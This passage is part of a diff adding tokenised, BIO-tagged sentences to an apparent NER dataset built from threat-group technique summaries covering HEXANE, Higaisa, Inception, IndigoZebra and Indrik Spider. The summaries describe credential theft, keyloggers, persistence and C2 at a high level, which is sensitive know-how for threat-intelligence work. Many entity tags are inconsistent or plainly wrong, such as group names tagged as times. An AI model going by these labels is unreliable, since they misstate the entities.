"I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "Base64-encoded", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "run", + "`cmdkey`", + "on", + "victim", + "machines", + "to", + "identify", + "stored", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "a", + "Mimikatz-based", + "tool", + "and", + "a", + "PowerShell", + "script", + "to", + "steal", + "passwords", + "from", + "Google", + "Chrome." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "set", + "up", + "custom", + "DNS", + "servers", + "to", + "send", + "commands", + "to", + "compromised", + "hosts", + "via", + "TXT", + "records." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "registered", + "and", + "operated", + "domains", + "for", + "campaigns,", + "often", + "using", + "a", + "security", + "or", + "web", + "technology", + "theme", + "or", + "impersonating", + "the", + "targeted", + "organization." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "compromised", + "accounts", + "to", + "send", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "established", + "email", + "accounts", + "for", + "use", + "in", + "domain", + "registration", + "including", + "for", + "ProtonMail", + "addresses." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "targeted", + "executives,", + "human", + "resources", + "staff,", + "and", + "IT", + "personnel", + "for", + "spearphishing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "B-Org", + "B-SecTeam", + "B-Org", + "O", + "I-Org", + "I-Org", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "cloud", + "services,", + "including", + "OneDrive,", + "for", + "data", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "identified", + "specific", + "potential", + "victims", + "at", + "targeted", + "organizations." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "identified", + "executives,", + "HR,", + "and", + "IT", + "staff", + "at", + "victim", + "organizations", + "for", + "further", + "targeting." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Org", + "B-Time", + "O", + "I-Org", + "I-Org", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "downloaded", + "additional", + "payloads", + "and", + "malicious", + "scripts", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "conducted", + "internal", + "spearphishing", + "attacks", + "against", + "executives,", + "HR,", + "and", + "IT", + "personnel", + "to", + "gain", + "information", + "and", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "B-Org", + "B-Org", + "O", + "I-Org", + "I-Org", + "O", + "I-Purp", + "I-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "tools", + "including", + "BITSAdmin", + "to", + "test", + "internet", + "connectivity", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "a", + "PowerShell-based", + "keylogger", + "named", + "`kl.ps1`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "run", + "`net", + "localgroup`", + "to", + "enumerate", + "local", + "groups." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "relied", + "on", + "victim's", + "executing", + "malicious", + "file", + "attachments", + "delivered", + "via", + "email", + "or", + "embedded", + "within", + "actor-controlled", + "websites", + "to", + "deliver", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "password", + "spraying", + "attacks", + "to", + "obtain", + "valid", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "PowerShell-based", + "tools", + "and", + "scripts", + "for", + "discovery", + "and", + "collection", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "enumerated", + "processes", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "remote", + "desktop", + "sessions", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "`net", + "view`", + "to", + "enumerate", + "domain", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "a", + "scheduled", + "task", + "to", + "establish", + "persistence", + "for", + "a", + "keylogger." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "established", + "fraudulent", + "LinkedIn", + "accounts", + "impersonating", + "HR", + "department", + "employees", + "to", + "target", + "potential", + "victims", + "with", + "fake", + "job", + "offers." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "I-Org", + "I-Org", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "enumerated", + "programs", + "installed", + "on", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "collected", + "the", + "hostname", + "of", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "Ping", + "and", + "`tracert`", + "for", + "network", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "netstat", + "to", + "monitor", + "connections", + "to", + "specific", + "ports." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "run", + "`whoami`", + "on", + "compromised", + "machines", + "to", + "identify", + "the", + "current", + "user." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "acquired,", + "and", + "sometimes", + "customized,", + "open", + "source", + "tools", + "such", + "as", + "Mimikatz,", + "Empire,", + "VNC", + "remote", + "access", + "software,", + "and", + "DIG.net." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "staged", + "malware", + "on", + "fraudulent", + "websites", + "set", + "up", + "to", + "impersonate", + "targeted", + "organizations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "a", + "VisualBasic", + "script", + "named", + "`MicrosoftUpdator.vbs`", + "for", + "execution", + "of", + "a", + "PowerShell", + "keylogger." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "WMI", + "event", + "subscriptions", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "performed", + "padding", + "with", + "null", + "bytes", + "before", + "calculating", + "its", + "hash." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa’s", + "JavaScript", + "file", + "used", + "a", + "legitimate", + "Microsoft", + "Office", + "2007", + "package", + "to", + "side-load", + "the", + "<code>OINFO12.OCX</code>", + "dynamic", + "link", + "library." + ], + "ner_tags": [ + "B-Idus", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "certutil", + "to", + "decode", + "Base64", + "binaries", + "at", + "runtime", + "and", + "a", + "16-byte", + "XOR", + "key", + "to", + "decrypt", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "Base64", + "encoded", + "compressed", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "exfiltrated", + "data", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "has", + "exploited", + "CVE-2018-0798", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "a", + "payload", + "that", + "creates", + "a", + "hidden", + "window." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "discovered", + "system", + "proxy", + "settings", + "and", + "used", + "them", + "if", + "available." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "JavaScript", + "to", + "execute", + "additional", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "malicious", + "e-mail", + "attachments", + "to", + "lure", + "victims", + "into", + "executing", + "LNK", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "named", + "a", + "shellcode", + "loader", + "binary", + "<code>svchast.exe</code>", + "to", + "spoof", + "the", + "legitimate", + "<code>svchost.exe</code>." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Higaisa", + "has", + "called", + "various", + "native", + "OS", + "APIs." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa’s", + "shellcode", + "attempted", + "to", + "find", + "the", + "process", + "ID", + "of", + "the", + "current", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "a", + "FakeTLS", + "session", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "added", + "a", + "spoofed", + "binary", + "to", + "the", + "start-up", + "folder", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "dropped", + "and", + "added", + "<code>officeupdate.exe</code>", + "to", + "scheduled", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "sent", + "the", + "victim", + "computer", + "identifier", + "in", + "a", + "User-Agent", + "string", + "back", + "to", + "the", + "C2", + "server", + "every", + "10", + "minutes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "AES-128", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "collected", + "the", + "system", + "volume", + "serial", + "number,", + "GUID,", + "and", + "computer", + "name." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "<code>ipconfig</code>", + "to", + "gather", + "network", + "configuration", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "a", + "function", + "to", + "gather", + "the", + "current", + "time." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "has", + "used", + "VBScript", + "code", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "HTTP", + "and", + "HTTPS", + "to", + "send", + "data", + "back", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "<code>cmd.exe</code>", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Higaisa", + "used", + "an", + "XSL", + "file", + "to", + "run", + "VBScript", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "used", + "a", + "browser", + "plugin", + "to", + "steal", + "passwords", + "and", + "sessions", + "from", + "Internet", + "Explorer,", + "Chrome,", + "Opera,", + "Firefox,", + "Torch,", + "and", + "Yandex." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Inception", + "used", + "a", + "file", + "hunting", + "plugin", + "to", + "collect", + ".txt,", + ".pdf,", + ".xls", + "or", + ".doc", + "files", + "from", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "used", + "specific", + "malware", + "modules", + "to", + "gather", + "domain", + "membership." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "encrypted", + "malware", + "payloads", + "dropped", + "on", + "victim", + "machines", + "with", + "AES", + "and", + "RC4", + "encryption." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "exploited", + "CVE-2012-0158,", + "CVE-2014-1761,", + "CVE-2017-11882", + "and", + "CVE-2018-0802", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "used", + "a", + "file", + "listing", + "plugin", + "to", + "collect", + "information", + "about", + "file", + "and", + "directories", + "both", + "on", + "local", + "and", + "remote", + "drives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "lured", + "victims", + "into", + "clicking", + "malicious", + "files", + "for", + "machine", + "reconnaissance", + "and", + "to", + "execute", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "used", + "malicious", + "HTA", + "files", + "to", + "drop", + "and", + "execute", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "used", + "chains", + "of", + "compromised", + "routers", + "to", + "proxy", + "C2", + "communications", + "between", + "them", + "and", + "cloud", + "service", + "providers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "used", + "PowerShell", + "to", + "execute", + "malicious", + "commands", + "and", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "used", + "a", + "reconnaissance", + "module", + "to", + "identify", + "active", + "processes", + "and", + "other", + "associated", + "loaded", + "modules." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "maintained", + "persistence", + "by", + "modifying", + "Registry", + "run", + "key", + "value", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Inception", + "has", + "ensured", + "persistence", + "at", + "system", + "boot", + "by", + "setting", + "the", + "value", + "<code>regsvr32", + "%path%\\ctfmonrn.dll", + "/s</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Inception", + "has", + "enumerated", + "installed", + "software", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "used", + "weaponized", + "documents", + "attached", + "to", + "spearphishing", + "emails", + "for", + "reconnaissance", + "and", + "initial", + "compromise." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "encrypted", + "network", + "communications", + "with", + "AES." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Inception", + "has", + "used", + "a", + "reconnaissance", + "module", + "to", + "gather", + "information", + "about", + "the", + "operating", + "system", + "and", + "hardware", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "used", + "decoy", + "documents", + "to", + "load", + "malicious", + "remote", + "payloads", + "via", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Inception", + "has", + "obtained", + "and", + "used", + "open-source", + "tools", + "such", + "as", + "LaZagne." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Inception", + "has", + "used", + "VBScript", + "to", + "execute", + "malicious", + "commands", + "and", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "used", + "HTTP,", + "HTTPS,", + "and", + "WebDav", + "in", + "network", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inception", + "has", + "incorporated", + "at", + "least", + "five", + "different", + "cloud", + "service", + "providers", + "into", + "their", + "C2", + "infrastructure", + "including", + "CloudMe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "IndigoZebra", + "has", + "established", + "domains,", + "some", + "of", + "which", + "were", + "designed", + "to", + "look", + "like", + "official", + "government", + "domains,", + "for", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IndigoZebra", + "has", + "compromised", + "legitimate", + "email", + "accounts", + "to", + "use", + "in", + "their", + "spearphishing", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "IndigoZebra", + "has", + "downloaded", + "additional", + "files", + "and", + "tools", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IndigoZebra", + "sent", + "spearphishing", + "emails", + "containing", + "malicious", + "attachments", + "that", + "urged", + "recipients", + "to", + "review", + "modifications", + "in", + "the", + "file", + "which", + "would", + "trigger", + "the", + "attack." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IndigoZebra", + "sent", + "spearphishing", + "emails", + "containing", + "malicious", + "password-protected", + "RAR", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "IndigoZebra", + "has", + "acquired", + "open", + "source", + "tools", + "such", + "as", + "NBTscan", + "and", + "Meterpreter", + "for", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IndigoZebra", + "created", + "Dropbox", + "accounts", + "for", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "used", + "Cobalt", + "Strike", + "to", + "empty", + "log", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "used", + "<code>wmic.exe</code>", + "to", + "add", + "a", + "new", + "user", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "encrypted", + "domain-controlled", + "systems", + "using", + "BitPaymer." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "used", + "PsExec", + "to", + "leverage", + "Windows", + "Defender", + "to", + "disable", + "scanning", + "of", + "all", + "downloaded", + "files", + "and", + "to", + "restrict", + "real-time", + "monitoring." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "collected", + "credentials", + "from", + "infected", + "systems,", + "including", + "domain", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "created", + "email", + "accounts", + "to", + "communicate", + "with", + "their", + "ransomware", + "victims,", + "to", + "include", + "providing", + "payment", + "and", + "decryption", + "details." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "used", + "Group", + "Policy", + "Objects", + "to", + "deploy", + "batch", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "downloaded", + "additional", + "scripts,", + "malware,", + "and", + "tools", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "used", + "malicious", + "JavaScript", + "files", + "for", + "several", + "components", + "of", + "their", + "attack." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "used", + "Cobalt", + "Strike", + "to", + "carry", + "out", + "credential", + "dumping", + "using", + "ProcDump." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "stored", + "collected", + "date", + "in", + "a", + ".tmp", + "file." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + 